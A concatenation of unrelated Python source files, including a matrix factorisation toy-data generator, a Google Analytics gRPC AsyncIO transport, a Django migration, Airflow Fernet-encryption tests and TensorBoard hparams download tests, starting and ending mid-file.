            sums_columns = M.sum(axis=0)
            sums_rows = M.sum(axis=1)
            for i,c in enumerate(sums_rows):
                assert c != 0, "Fully unobserved row in M, row %s. Fraction %s." % (i,fraction_unknown)
            for j,c in enumerate(sums_columns):
                assert c != 0, "Fully unobserved column in M, column %s. Fraction %s." % (j,fraction_unknown)
            print "Took %s attempts to generate M." % attempt
            return M
        except AssertionError:
            pass
    raise Exception("Tried to generate M %s times, with I=%s, J=%s, fraction=%s, but failed." % (attempts,I,J,fraction_unknown))
      
##########

if __name__ == "__main__":
    output_folder = project_location+"BNMTF/data_toy/bnmf/"

    I,J,K = 100, 80, 10 #20, 10, 5 #
    fraction_unknown = 0.1
    alpha, beta = 1., 1.
    lambdaU = numpy.ones((I,K))
    lambdaV = numpy.ones((I,K))
    tau = alpha / beta
    
    (U,V,tau,true_R,R) = generate_dataset(I,J,K,lambdaU,lambdaV,tau)
    
    # Try to generate M
    M = try_generate_M(I,J,fraction_unknown,attempts=1000)
    
    # Store all matrices in text files
    numpy.savetxt(open(output_folder+"U.txt",'w'),U)
    numpy.savetxt(open(output_folder+"V.txt",'w'),V)
    numpy.savetxt(open(output_folder+"R_true.txt",'w'),true_R)
    numpy.savetxt(open(output_folder+"R.txt",'w'),R)
    numpy.savetxt(open(output_folder+"M.txt",'w'),M)
    
    print "Mean R: %s. Variance R: %s. Min R: %s. Max R: %s." % (numpy.mean(R),numpy.var(R),R.min(),R.max())
    fig = plt.figure()
    plt.hist(R.flatten(),bins=range(0,int(R.max())+1))
    plt.show()
# -*- coding: utf-8 -*-
# Copyright 2014, 2015 Metaswitch Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
felix.test.stub_utils
~~~~~~~~~~~~~~~~~~~~~

Test utilities.
"""
import logging
import random

from collections import namedtuple
# Named (stdout, stderr) pair — presumably the captured output of a
# shelled-out command; verify against callers.
CommandOutput = namedtuple('CommandOutput', ['stdout', 'stderr'])

# Logger
log = logging.getLogger(__name__)

# The current simulated time, written by set_time() and read by get_time().
test_time = 0

def set_time(value):
    """Set the simulated test time returned by get_time().

    Args:
        value: the new time value, stored in the module global test_time.
    """
    global test_time
    test_time = value
    # Lazy %-args: the message is only formatted if DEBUG logging is enabled.
    log.debug("Time now set to : %d", test_time)

def get_time():
    """Return the current simulated test time (module global test_time)."""
    return test_time

def get_mac():
    """Return a random MAC address as six colon-separated hex octets."""
    octets = [random.randint(0x00, 0xff) for _ in range(6)]
    return "%02x:%02x:%02x:%02x:%02x:%02x" % tuple(octets)

# Exception raised when tests reach the end.
class TestOverException(Exception):
    """Raised when a test scenario reaches its scripted end."""
    pass

# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union

from google.api_core import gapic_v1  # type: ignore
from google.api_core import grpc_helpers_async  # type: ignore
from google.auth import credentials as ga_credentials  # type: ignore
from google.auth.transport.grpc import SslCredentials  # type: ignore
import packaging.version

import grpc  # type: ignore
from grpc.experimental import aio  # type: ignore

from google.analytics.data_v1alpha.types import analytics_data_api
from .base import AlphaAnalyticsDataTransport, DEFAULT_CLIENT_INFO
from .grpc import AlphaAnalyticsDataGrpcTransport


class AlphaAnalyticsDataGrpcAsyncIOTransport(AlphaAnalyticsDataTransport):
    """gRPC AsyncIO backend transport for AlphaAnalyticsData.

    Google Analytics reporting data service.

    This class defines the same methods as the primary client, so the
    primary client can load the underlying transport implementation
    and call it.

    It sends protocol buffers over the wire using gRPC (which is built on
    top of HTTP/2); the ``grpcio`` package must be installed.
    """

    _grpc_channel: aio.Channel
    # Cache of RPC stub callables keyed by method name; replaced with a
    # per-instance dict in __init__.
    _stubs: Dict[str, Callable] = {}

    @classmethod
    def create_channel(
        cls,
        host: str = "analyticsdata.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        **kwargs,
    ) -> aio.Channel:
        """Create and return a gRPC AsyncIO channel object.
        Args:
            host (Optional[str]): The host for the channel to use.
            credentials (Optional[~.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify this application to the service. If
                none are specified, the client will attempt to ascertain
                the credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            kwargs (Optional[dict]): Keyword arguments, which are passed to the
                channel creation.
        Returns:
            aio.Channel: A gRPC AsyncIO channel object.
        """

        return grpc_helpers_async.create_channel(
            host,
            credentials=credentials,
            credentials_file=credentials_file,
            quota_project_id=quota_project_id,
            default_scopes=cls.AUTH_SCOPES,
            scopes=scopes,
            default_host=cls.DEFAULT_HOST,
            **kwargs,
        )

    def __init__(
        self,
        *,
        host: str = "analyticsdata.googleapis.com",
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        channel: aio.Channel = None,
        api_mtls_endpoint: str = None,
        client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
        ssl_channel_credentials: grpc.ChannelCredentials = None,
        client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
        quota_project_id=None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
    ) -> None:
        """Instantiate the transport.

        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
                This argument is ignored if ``channel`` is provided.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
                service. These are only used when credentials are not specified and
                are passed to :func:`google.auth.default`.
            channel (Optional[aio.Channel]): A ``Channel`` instance through
                which to make calls.
            api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
                If provided, it overrides the ``host`` argument and tries to create
                a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
            client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
                Deprecated. A callback to provide client SSL certificate bytes and
                private key bytes, both in PEM format. It is ignored if
                ``api_mtls_endpoint`` is None.
            ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
                for the grpc channel. It is ignored if ``channel`` is provided.
            client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
                A callback to provide client certificate bytes and private key bytes,
                both in PEM format. It is used to configure a mutual TLS channel. It is
                ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.

        Raises:
            google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
                creation failed for any reason.
            google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
                and ``credentials_file`` are passed.
        """
        self._grpc_channel = None
        self._ssl_channel_credentials = ssl_channel_credentials
        self._stubs: Dict[str, Callable] = {}

        if api_mtls_endpoint:
            warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
        if client_cert_source:
            warnings.warn("client_cert_source is deprecated", DeprecationWarning)

        if channel:
            # Ignore credentials if a channel was passed.
            credentials = False
            # If a channel was explicitly provided, set it.
            self._grpc_channel = channel
            self._ssl_channel_credentials = None
        else:
            if api_mtls_endpoint:
                host = api_mtls_endpoint

                # Create SSL credentials with client_cert_source or application
                # default SSL credentials.
                if client_cert_source:
                    cert, key = client_cert_source()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )
                else:
                    self._ssl_channel_credentials = SslCredentials().ssl_credentials

            else:
                if client_cert_source_for_mtls and not ssl_channel_credentials:
                    cert, key = client_cert_source_for_mtls()
                    self._ssl_channel_credentials = grpc.ssl_channel_credentials(
                        certificate_chain=cert, private_key=key
                    )

        # The base transport sets the host, credentials and scopes
        super().__init__(
            host=host,
            credentials=credentials,
            credentials_file=credentials_file,
            scopes=scopes,
            quota_project_id=quota_project_id,
            client_info=client_info,
            always_use_jwt_access=always_use_jwt_access,
        )

        if not self._grpc_channel:
            self._grpc_channel = type(self).create_channel(
                self._host,
                credentials=self._credentials,
                credentials_file=credentials_file,
                scopes=self._scopes,
                ssl_credentials=self._ssl_channel_credentials,
                quota_project_id=quota_project_id,
                options=[
                    ("grpc.max_send_message_length", -1),
                    ("grpc.max_receive_message_length", -1),
                ],
            )

        # Wrap messages. This must be done after self._grpc_channel exists
        self._prep_wrapped_messages(client_info)

    @property
    def grpc_channel(self) -> aio.Channel:
        """Create the channel designed to connect to this service.

        This property caches on the instance; repeated calls return
        the same channel.
        """
        # Return the channel from cache.
        return self._grpc_channel

    @property
    def run_report(
        self,
    ) -> Callable[
        [analytics_data_api.RunReportRequest],
        Awaitable[analytics_data_api.RunReportResponse],
    ]:
        r"""Return a callable for the run report method over gRPC.

        Returns a customized report of your Google Analytics
        event data. Reports contain statistics derived from data
        collected by the Google Analytics tracking code. The
        data returned from the API is as a table with columns
        for the requested dimensions and metrics. Metrics are
        individual measurements of user activity on your
        property, such as active users or event count.
        Dimensions break down metrics across some common
        criteria, such as country or event name.

        Returns:
            Callable[[~.RunReportRequest],
                    Awaitable[~.RunReportResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "run_report" not in self._stubs:
            self._stubs["run_report"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/RunReport",
                request_serializer=analytics_data_api.RunReportRequest.serialize,
                response_deserializer=analytics_data_api.RunReportResponse.deserialize,
            )
        return self._stubs["run_report"]

    @property
    def run_pivot_report(
        self,
    ) -> Callable[
        [analytics_data_api.RunPivotReportRequest],
        Awaitable[analytics_data_api.RunPivotReportResponse],
    ]:
        r"""Return a callable for the run pivot report method over gRPC.

        Returns a customized pivot report of your Google
        Analytics event data. Pivot reports are more advanced
        and expressive formats than regular reports. In a pivot
        report, dimensions are only visible if they are included
        in a pivot. Multiple pivots can be specified to further
        dissect your data.

        Returns:
            Callable[[~.RunPivotReportRequest],
                    Awaitable[~.RunPivotReportResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "run_pivot_report" not in self._stubs:
            self._stubs["run_pivot_report"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/RunPivotReport",
                request_serializer=analytics_data_api.RunPivotReportRequest.serialize,
                response_deserializer=analytics_data_api.RunPivotReportResponse.deserialize,
            )
        return self._stubs["run_pivot_report"]

    @property
    def batch_run_reports(
        self,
    ) -> Callable[
        [analytics_data_api.BatchRunReportsRequest],
        Awaitable[analytics_data_api.BatchRunReportsResponse],
    ]:
        r"""Return a callable for the batch run reports method over gRPC.

        Returns multiple reports in a batch. All reports must
        be for the same Entity.

        Returns:
            Callable[[~.BatchRunReportsRequest],
                    Awaitable[~.BatchRunReportsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "batch_run_reports" not in self._stubs:
            self._stubs["batch_run_reports"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/BatchRunReports",
                request_serializer=analytics_data_api.BatchRunReportsRequest.serialize,
                response_deserializer=analytics_data_api.BatchRunReportsResponse.deserialize,
            )
        return self._stubs["batch_run_reports"]

    @property
    def batch_run_pivot_reports(
        self,
    ) -> Callable[
        [analytics_data_api.BatchRunPivotReportsRequest],
        Awaitable[analytics_data_api.BatchRunPivotReportsResponse],
    ]:
        r"""Return a callable for the batch run pivot reports method over gRPC.

        Returns multiple pivot reports in a batch. All
        reports must be for the same Entity.

        Returns:
            Callable[[~.BatchRunPivotReportsRequest],
                    Awaitable[~.BatchRunPivotReportsResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "batch_run_pivot_reports" not in self._stubs:
            self._stubs["batch_run_pivot_reports"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/BatchRunPivotReports",
                request_serializer=analytics_data_api.BatchRunPivotReportsRequest.serialize,
                response_deserializer=analytics_data_api.BatchRunPivotReportsResponse.deserialize,
            )
        return self._stubs["batch_run_pivot_reports"]

    @property
    def get_metadata(
        self,
    ) -> Callable[
        [analytics_data_api.GetMetadataRequest], Awaitable[analytics_data_api.Metadata]
    ]:
        r"""Return a callable for the get metadata method over gRPC.

        Returns metadata for dimensions and metrics available in
        reporting methods. Used to explore the dimensions and metrics.
        In this method, a Google Analytics GA4 Property Identifier is
        specified in the request, and the metadata response includes
        Custom dimensions and metrics as well as Universal metadata.

        For example if a custom metric with parameter name
        ``levels_unlocked`` is registered to a property, the Metadata
        response will contain ``customEvent:levels_unlocked``. Universal
        metadata are dimensions and metrics applicable to any property
        such as ``country`` and ``totalUsers``.

        Returns:
            Callable[[~.GetMetadataRequest],
                    Awaitable[~.Metadata]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "get_metadata" not in self._stubs:
            self._stubs["get_metadata"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/GetMetadata",
                request_serializer=analytics_data_api.GetMetadataRequest.serialize,
                response_deserializer=analytics_data_api.Metadata.deserialize,
            )
        return self._stubs["get_metadata"]

    @property
    def run_realtime_report(
        self,
    ) -> Callable[
        [analytics_data_api.RunRealtimeReportRequest],
        Awaitable[analytics_data_api.RunRealtimeReportResponse],
    ]:
        r"""Return a callable for the run realtime report method over gRPC.

        The Google Analytics Realtime API returns a
        customized report of realtime event data for your
        property. These reports show events and usage from the
        last 30 minutes.

        Returns:
            Callable[[~.RunRealtimeReportRequest],
                    Awaitable[~.RunRealtimeReportResponse]]:
                A function that, when called, will call the underlying RPC
                on the server.
        """
        # Generate a "stub function" on-the-fly which will actually make
        # the request.
        # gRPC handles serialization and deserialization, so we just need
        # to pass in the functions for each.
        if "run_realtime_report" not in self._stubs:
            self._stubs["run_realtime_report"] = self.grpc_channel.unary_unary(
                "/google.analytics.data.v1alpha.AlphaAnalyticsData/RunRealtimeReport",
                request_serializer=analytics_data_api.RunRealtimeReportRequest.serialize,
                response_deserializer=analytics_data_api.RunRealtimeReportResponse.deserialize,
            )
        return self._stubs["run_realtime_report"]


# Explicit public API of this module.
__all__ = ("AlphaAnalyticsDataGrpcAsyncIOTransport",)

# Generated by Django 2.1.7 on 2019-04-30 13:20

from django.db import migrations, models
import uuid


class Migration(migrations.Migration):
    """Switch PublishableModel's primary key to a non-editable UUID field."""

    dependencies = [
        ('core', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='publishablemodel',
            name='id',
            field=models.UUIDField(
                default=uuid.uuid4,
                editable=False,
                primary_key=True,
                serialize=False,
            ),
        ),
    ]

#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from solum.api.controllers import common_types
from solum.api.controllers.v1.datamodel import types as api_types

#from solum.openstack.common import log as logging


#LOG = logging.getLogger(__name__)


class Extensions(api_types.Base):
    """Extensions resource."""

    extension_links = [common_types.Link]
    """This attribute contains Links to extension resources that contain
     information about the extensions supported by this Platform."""

    def __init__(self, **kwargs):
        # Forward everything to the wsme-style base type untouched.
        super(Extensions, self).__init__(**kwargs)

"""Custom Exception Classes for Phylotyper Module

"""

class PhylotyperError(Exception):
    """Basic exception for errors raised by Phylotyper modules.

    Attributes:
        subtype: the subtype value that triggered the error.
    """
    def __init__(self, subtype, msg=None):
        if msg is None:
            # Fixed spelling: "occured" -> "occurred".
            msg = "An error occurred for subtype {}".format(subtype)
        super(PhylotyperError, self).__init__(msg)
        self.subtype = subtype


class ValuesError(PhylotyperError):
    """Raised for an unrecognized subtype."""
    def __init__(self, subtype, msg=None):
        # Bug fix: the original called super(PhylotyperError, self), which
        # skipped PhylotyperError.__init__ and passed an unsupported `msg`
        # keyword straight to Exception.__init__ (TypeError at raise time).
        super(ValuesError, self).__init__(
            subtype, msg or "Unrecognized subtype {}".format(subtype))
 
 
class DatabaseError(PhylotyperError):
    """Raised when expected data is missing from the database.

    Attributes:
        data: description of the missing data item.
    """
    def __init__(self, subtype, data, msg=None):
        default_msg = "Database is missing data {} for {}".format(data, subtype)
        # Bug fix: call super with this class (not PhylotyperError) so that
        # PhylotyperError.__init__ actually runs and sets self.subtype.
        super(DatabaseError, self).__init__(subtype, msg or default_msg)
        self.data = data
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.

import unittest

from cryptography.fernet import Fernet

from airflow import settings
from airflow.models import Variable, crypto
from tests.test_utils.config import conf_vars


class TestVariable(unittest.TestCase):
    """Checks Variable storage with and without Fernet encryption."""

    def setUp(self):
        # Drop the cached Fernet object so each test reads its own key config.
        crypto._fernet = None

    def tearDown(self):
        crypto._fernet = None

    @conf_vars({('core', 'fernet_key'): ''})
    def test_variable_no_encryption(self):
        """
        Test variables without encryption
        """
        Variable.set('key', 'value')
        stored = settings.Session().query(Variable).filter(Variable.key == 'key').one()
        self.assertFalse(stored.is_encrypted)
        self.assertEqual(stored.val, 'value')

    @conf_vars({('core', 'fernet_key'): Fernet.generate_key().decode()})
    def test_variable_with_encryption(self):
        """
        Test variables with encryption
        """
        Variable.set('key', 'value')
        stored = settings.Session().query(Variable).filter(Variable.key == 'key').one()
        self.assertTrue(stored.is_encrypted)
        self.assertEqual(stored.val, 'value')

    def test_var_with_encryption_rotate_fernet_key(self):
        """
        Tests rotating encrypted variables.
        """
        old_key = Fernet.generate_key()
        new_key = Fernet.generate_key()

        with conf_vars({('core', 'fernet_key'): old_key.decode()}):
            Variable.set('key', 'value')
            stored = settings.Session().query(Variable).filter(Variable.key == 'key').one()
            self.assertTrue(stored.is_encrypted)
            self.assertEqual(stored.val, 'value')
            self.assertEqual(Fernet(old_key).decrypt(stored._val.encode()), b'value')

        # Old ciphertext must still decrypt when the old key is kept as a
        # secondary entry in the (comma-separated) key list.
        with conf_vars({('core', 'fernet_key'): ','.join([new_key.decode(), old_key.decode()])}):
            crypto._fernet = None
            self.assertEqual(stored.val, 'value')

            # After rotation the value must be re-encrypted under the new key.
            stored.rotate_fernet_key()
            self.assertTrue(stored.is_encrypted)
            self.assertEqual(stored.val, 'value')
            self.assertEqual(Fernet(new_key).decrypt(stored._val.encode()), b'value')

# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for download_data."""


from unittest import mock

from google.protobuf import text_format
import tensorflow as tf

from tensorboard.backend.event_processing import plugin_event_multiplexer
from tensorboard.plugins import base_plugin
from tensorboard.plugins.hparams import api_pb2
from tensorboard.plugins.hparams import backend_context
from tensorboard.plugins.hparams import download_data

# Textproto fixture: an hparams Experiment with five hparams and three metrics.
EXPERIMENT = """
description: 'Test experiment'
user: 'Test user'
hparam_infos: [
  {
    name: 'initial_temp'
    type: DATA_TYPE_FLOAT64
  },
  {
    name: 'final_temp'
    type: DATA_TYPE_FLOAT64
  },
  { name: 'string_hparam' },
  { name: 'bool_hparam' },
  { name: 'optional_string_hparam' }
]
metric_infos: [
  { name: { tag: 'current_temp' } },
  { name: { tag: 'delta_temp' } },
  { name: { tag: 'optional_metric' } }
]
"""

# Textproto fixture: a ListSessionGroupsResponse with three session groups;
# only group_1 reports the optional_metric.
SESSION_GROUPS = """
session_groups {
  name: "group_1"
  hparams { key: "bool_hparam" value { bool_value: true } }
  hparams { key: "final_temp" value { number_value: 150.0 } }
  hparams { key: "initial_temp" value { number_value: 270.0 } }
  hparams { key: "string_hparam" value { string_value: "a string" } }
  metric_values {
    name { tag: "current_temp" }
    value: 10
    training_step: 1
    wall_time_secs: 1.0
  }
  metric_values { name { tag: "delta_temp" } value: 15
    training_step: 2
    wall_time_secs: 10.0
  }
  metric_values { name { tag: "optional_metric" } value: 33
    training_step: 20
    wall_time_secs: 2.0
  }
  sessions {
    name: "session_1"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_SUCCESS
    metric_values {
      name { tag: "current_temp" }
      value: 10
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values {
      name { tag: "delta_temp" }
      value: 15
      training_step: 2
      wall_time_secs: 10.0
    }

    metric_values {
      name { tag: "optional_metric" }
      value: 33
      training_step: 20
      wall_time_secs: 2.0
    }
  }
}
session_groups {
  name: "group_2"
  hparams { key: "bool_hparam" value { bool_value: false } }
  hparams { key: "final_temp" value { number_value: 100.0 } }
  hparams { key: "initial_temp" value { number_value: 280.0 } }
  hparams { key: "string_hparam" value { string_value: "AAAAA"}}
  metric_values {
    name { tag: "current_temp" }
    value: 51.0
    training_step: 1
    wall_time_secs: 1.0
  }
  metric_values {
    name { tag: "delta_temp" }
    value: 44.5
    training_step: 2
    wall_time_secs: 10.3333333
  }
  sessions {
    name: "session_2"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_SUCCESS
    metric_values {
      name { tag: "current_temp" }
      value: 100
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" }
      value: 150
      training_step: 3
      wall_time_secs: 11.0
    }
  }
  sessions {
    name: "session_3"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_FAILURE
    metric_values {
      name { tag: "current_temp" }
      value: 1.0
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" }
      value: 1.5
      training_step: 2
      wall_time_secs: 10.0
    }
  }
  sessions {
    name: "session_5"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_SUCCESS
    metric_values {
      name { tag: "current_temp" }
      value: 52.0
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" }
      value: -18
      training_step: 2
      wall_time_secs: 10.0
    }
  }
}
session_groups {
  name: "group_3"
  hparams { key: "bool_hparam" value { bool_value: true } }
  hparams { key: "final_temp" value { number_value: 0.000012 } }
  hparams { key: "initial_temp" value { number_value: 300.0 } }
  hparams { key: "string_hparam" value { string_value: "a string_3"}}
  hparams {
    key: 'optional_string_hparam' value { string_value: 'BB' }
  }
  metric_values {
    name { tag: "current_temp" }
    value: 101.0
    training_step: 1
    wall_time_secs: 1.0
  }
  metric_values { name { tag: "delta_temp" } value: -15100000.0
    training_step: 2
    wall_time_secs: 10.0
  }
  sessions {
    name: "session_4"
    start_time_secs: 314159
    end_time_secs: 314164
    status: STATUS_UNKNOWN
    metric_values {
      name { tag: "current_temp" }
      value: 101.0
      training_step: 1
      wall_time_secs: 1.0
    }
    metric_values { name { tag: "delta_temp" } value: -151000000.0
      training_step: 2
      wall_time_secs: 10.0
    }
  }
}
total_size: 3
"""


# Expected LaTeX rendering of the fixture above (one row per session group;
# missing optional_metric values render as "-").
EXPECTED_LATEX = r"""\begin{table}[tbp]
\begin{tabular}{llllllll}
initial\_temp & final\_temp & string\_hparam & bool\_hparam & optional\_string\_hparam & current\_temp & delta\_temp & optional\_metric \\ \hline
$270$ & $150$ & a string & $1$ &  & $10$ & $15$ & $33$ \\
$280$ & $100$ & AAAAA & $0$ &  & $51$ & $44.5$ & - \\
$300$ & $1.2\cdot 10^{-5}$ & a string\_3 & $1$ & BB & $101$ & $-1.51\cdot 10^{7}$ & - \\
\hline
\end{tabular}
\end{table}
"""

# Expected CSV rendering (CRLF line endings; missing values are empty cells).
EXPECTED_CSV = """initial_temp,final_temp,string_hparam,bool_hparam,optional_string_hparam,current_temp,delta_temp,optional_metric\r
270.0,150.0,a string,True,,10.0,15.0,33.0\r
280.0,100.0,AAAAA,False,,51.0,44.5,\r
300.0,1.2e-05,a string_3,True,BB,101.0,-15100000.0,\r
"""


class DownloadDataTest(tf.test.TestCase):
    """Exercises download_data.Handler for each supported output format."""

    def setUp(self):
        multiplexer = mock.create_autospec(
            plugin_event_multiplexer.EventMultiplexer
        )
        self._mock_multiplexer = multiplexer
        self._mock_tb_context = base_plugin.TBContext(multiplexer=multiplexer)

    def _run_handler(self, experiment, session_groups, response_format):
        """Parse the textproto fixtures and invoke the download handler."""
        experiment_proto = text_format.Merge(experiment, api_pb2.Experiment())
        session_groups_proto = text_format.Merge(
            session_groups, api_pb2.ListSessionGroupsResponse()
        )
        # Request every column (all hparams followed by all metrics).
        column_count = len(experiment_proto.hparam_infos) + len(
            experiment_proto.metric_infos
        )
        handler = download_data.Handler(
            backend_context.Context(self._mock_tb_context),
            experiment_proto,
            session_groups_proto,
            response_format,
            [True] * column_count,
        )
        return handler.run()

    def test_csv(self):
        body, mime_type = self._run_handler(
            EXPERIMENT, SESSION_GROUPS, download_data.OutputFormat.CSV
        )
        self.assertEqual("text/csv", mime_type)
        self.assertEqual(EXPECTED_CSV, body)

    def test_latex(self):
        body, mime_type = self._run_handler(
            EXPERIMENT, SESSION_GROUPS, download_data.OutputFormat.LATEX
        )
        self.assertEqual("application/x-latex", mime_type)
        self.assertEqual(EXPECTED_LATEX, body)

    def test_json(self):
        body, mime_type = self._run_handler(
            EXPERIMENT, SESSION_GROUPS, download_data.OutputFormat.JSON
        )
        self.assertEqual("application/json", mime_type)
        expected_header = [
            "initial_temp",
            "final_temp",
            "string_hparam",
            "bool_hparam",
            "optional_string_hparam",
            "current_temp",
            "delta_temp",
            "optional_metric",
        ]
        expected_rows = [
            [270.0, 150.0, "a string", True, "", 10.0, 15.0, 33.0],
            [280.0, 100.0, "AAAAA", False, "", 51.0, 44.5, None],
            [
                300.0,
                1.2e-05,
                "a string_3",
                True,
                "BB",
                101.0,
                -15100000.0,
                None,
            ],
        ]
        self.assertEqual(
            {"header": expected_header, "rows": expected_rows}, body
        )


# Standard TensorFlow test entry point.
if __name__ == "__main__":
    tf.test.main()

#!/usr/bin/python
#
#  Copyright 2002-2019 Barcelona Supercomputing Center (www.bsc.es)
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
from exaqute.ExaquteTask import *

from pycompss.api.task import task
from pycompss.api.api import compss_wait_on
from pycompss.api.api import compss_barrier
from pycompss.api.api import compss_delete_object
from pycompss.api.api import compss_delete_file

from pycompss.api.parameter import *

from pycompss.api.implement import implement

from pycompss.api.constraint import *


class ExaquteTask(object):
    """Decorator adapting the ExaQUte task API onto a PyCOMPSs @task."""

    def __init__(self, *args, **kwargs):
        # NOTE(review): publishes a module-global marker string; kept as-is
        # since external code may inspect `scheduler`.
        global scheduler
